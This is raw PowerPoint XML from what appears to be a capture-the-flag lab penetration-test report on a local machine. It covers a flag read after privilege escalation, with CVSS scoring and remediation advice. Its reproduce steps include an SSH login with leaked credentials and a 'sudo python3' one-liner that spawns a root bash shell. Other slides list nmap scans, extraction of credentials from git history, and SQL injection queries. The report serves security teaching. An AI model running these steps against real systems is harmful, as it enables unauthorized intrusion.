            <a:off x="6716163" y="1972287"/>
            <a:ext cx="5217420" cy="2152452"/>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96412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BCBB6-4C6D-1B1A-D610-A0ACA902E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1B613-F7BA-93E5-75A0-001F7413E088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Flag Disclosure due to Weak File Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{801A2E62-FDB7-0679-626F-5DA88C31F89B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Flag Disclosure due to Weak File Permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>We able to access the system flag by reading a file that had weak or misconfigured permissions. After achieving root access through privilege escalation, the flag file could be read without any protection or access control, indicating that sensitive files were not properly secured.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Affected Machine, URL &amp; Parameter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Not web-based; accessed locally after privilege escalation                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>File: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Flag file (path not explicitly mentioned, but typically in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>`/root/` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>`/home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>losy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>/`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The flag was disclosed due to misconfigured file permissions, allowing unauthorized users with escalated privileges to access it. While it required prior exploitation, the lack of basic file protection increases the impact.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Risk / Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0"/>
              <a:t>Disclosure of sensitive or target-specific information (e.g., challenge completion, system control proof)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0"/>
              <a:t>Demonstrates poor system hardening and privilege separation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0"/>
              <a:t>Encourages attackers to escalate further or use disclosed data for persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Recommendation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1740" dirty="0"/>
              <a:t>Restrict file permissions to authorized users only (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1740" i="1" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1740" i="1" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1740" i="1" dirty="0"/>
              <a:t> 600` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1740" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1740" i="1" dirty="0"/>
              <a:t>stricter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1740" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1740" dirty="0"/>
              <a:t>Place sensitive files in protected directories with appropriate ownership</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1740" dirty="0"/>
              <a:t>Monitor access to critical files and directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1740" dirty="0"/>
              <a:t>Perform regular permission audits on sensitive or system-critical files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32937316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02FAC-BEA3-AA4B-3CB1-1CD183066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C19B0-40E5-DA54-0FE8-4B7E120A6A9B}"/>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267FED51-AEFF-7450-201C-92ADEA66689A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>CVSS Score: 6.5 (Medium)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Reference:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.redhat.com/sysadmin/linux-file-permissions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://owasp.org/www-project-top-ten/2017/A5_2017-Broken_Access_Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>After escalating to root, the attacker read the flag using: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>cat root.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Exact path for standard CTF:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>cd ~</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Process Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>We logged in via SSH using leaked credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Gained user-level shell and identified privilege escalation vector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Escalated to root using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t> python3`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Navigated to the flag location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Discovered flag was world-readable or accessible by root without restriction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Read the flag to complete the compromise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35196569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51E87-F7D1-ED64-2DE6-C2E22806D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3242AA-4894-B9B1-A69D-4444A967D0F8}"/>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66641B64-C2E1-EF34-39E0-48AFF1C30835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258418" y="805071"/>
            <a:ext cx="6569766" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Steps to Reproduce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SSH into machine: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ssh jehad@192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Escalate privileges: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0"/>
              <a:t>script -qc "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0"/>
              <a:t> python3 -c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0"/>
              <a:t>(\"/bin/bash\")'"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Access the flag:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>Cat root.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disclosed the final flag file — often a proof of full system compromise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Showed lack of proper access controls over sensitive system resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demonstrated a complete attacker kill-chain from initial access to goal achievement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3FCD402-6F5A-E145-582D-36873040DC2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7037070" y="1887220"/>
            <a:ext cx="4096314" cy="1760220"/>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1556825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FD6E7-FC41-4D7B-CA31-2BF6C45E1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97DD9-309E-32C7-764B-88DD43CD8E2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Tools and Commands Used in this Project:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C10B357E-7FAC-B538-D582-4545C6B16514}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Reconnaissance &amp; Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>Netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– for identifying live hosts on the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– for comprehensive port scanning and service detection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Example commands used:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> -p- -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> 192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> --version-all -O --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>osscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>-guess -A -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> --script vuln -T5 -p 21,22,80 192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Information Gathering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>Ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – to check network interface details on the attacker machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Manual Git enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Downloaded and analyzed a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>`.git/` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>directory manually using: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>git log </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extracted credentials from git commit history by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>git show a4d900a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Manual SQL Injection (SQLi) – exploited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>`id=' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>parameter using:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>'ORDER BY` queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>`UNION SELECT` queries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="506351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ADCDA-69C4-1664-D9CB-2664B34843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31A0F-EF19-37D6-E4AA-63C3F04FD6C9}"/>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A65465AB-5666-8938-E40E-2DCF580C57B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
